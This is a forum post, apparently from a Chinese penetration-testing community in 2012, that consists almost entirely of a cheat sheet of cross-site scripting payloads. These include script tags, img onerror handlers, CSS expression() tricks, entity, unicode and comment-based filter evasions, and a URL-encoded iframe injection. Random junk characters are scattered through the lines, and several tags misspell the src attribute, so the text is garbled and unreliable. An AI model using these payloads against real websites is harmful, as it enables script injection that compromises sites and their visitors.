中国网络渗透测试联盟

标题: xss [打印本页]

作者: admin    时间: 2012-9-15 14:09
标题: xss
<script>alert("跨站")</script>    (最常用)! z  f. ]+ E; B3 r# E, U3 z
<img scr=javascript:alert("跨站")></img>" ^$ J) W6 q+ X, q, O
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
7 E& E- V; i; e0 U* I+ h<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
0 e" v/ I6 g$ U2 j. Y7 j* \<img scr="#" onerror=alert(/跨站/)></img>
1 X" Q, Y1 f' d! m  Z0 b<img scr="#" style="xss:expression(alert(/xss/));"></img>+ p1 F4 |) {; s
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)6 _! |  i+ I5 v9 ~9 z6 k2 b
<img src=vbscript:msgbox ("xss")></img>3 J: C! r2 s& R7 L
<style> input {left:expression (alert('xss'))}</style>
" d8 A( g. n* b<div style={left:expression (alert('xss'))}></div>
- x$ U; f4 a+ D<div style={left:exp/* */ression (alert('xss'))}></div>- w# Q; l! y6 q3 X7 e6 S" r! v
<div style={left:\0065\0078ression (alert('xss'))}></div>* B, N" @1 w( l# i  g
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
! k' p1 h4 @. h1 }unicode <div style="{left:expRessioN (alert('xss'))}">
9 S3 S9 G( W; J0 U0 |- }4 ^, u- ?& A! _6 w
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["( d3 l( a1 n/ e" `* E7 w





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2